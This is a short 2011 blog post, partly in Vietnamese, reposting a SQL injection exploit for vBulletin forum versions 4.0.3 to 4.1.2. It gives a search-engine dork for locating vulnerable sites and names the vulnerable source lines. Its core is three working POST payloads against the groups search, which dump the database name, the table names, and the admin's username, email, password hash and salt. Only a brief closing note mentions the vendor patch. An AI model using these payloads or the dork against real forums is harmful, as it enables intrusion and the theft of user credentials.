Saturday, June 11, 2011

Exploit works on vbulletin version 4.0.3 -> 4.1.2

Download addons firefox: Live HTTP headerds
Chú ý phải tìm từ khóa nào có kết quả hiển thị lên được nhé

Product: http://www.vbulletin.com
Version: 4.0.x
Dork : inurl:"search.php?search_type=1"

--------------------------
# ~Vulnerable Codes~ #
--------------------------
/vb/search/searchtools.php - line 715;
/packages/vbforum/search/type/socialgroup.php - line 201:203;

--------------------------
# ~Exploit~ #
--------------------------
POST data on "Search Multiple Content Types" => "groups"

&cat[0]=1) UNION SELECT database()#
&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#

More info: http://j0hnx3r.org/?p=818

Thank my friends from Inj3ct0r Team (1337day.com)

--------------------------
# ~Advice~ #
--------------------------
Vendor already released a patch on vb#4.1.3.
UPDATE NOW!

Use HTTP debugger...
Or please watch this video to understand more: http://www.youtube.com/watch?v=fR9RGCqIPkc

---------------------

vBulletin 4.X Security Patch

http://www.vbulletin.com/forum/showthread.php/376995-vBulletin-4.X-Security-Patch?AID=804495&PID=564936

No comments: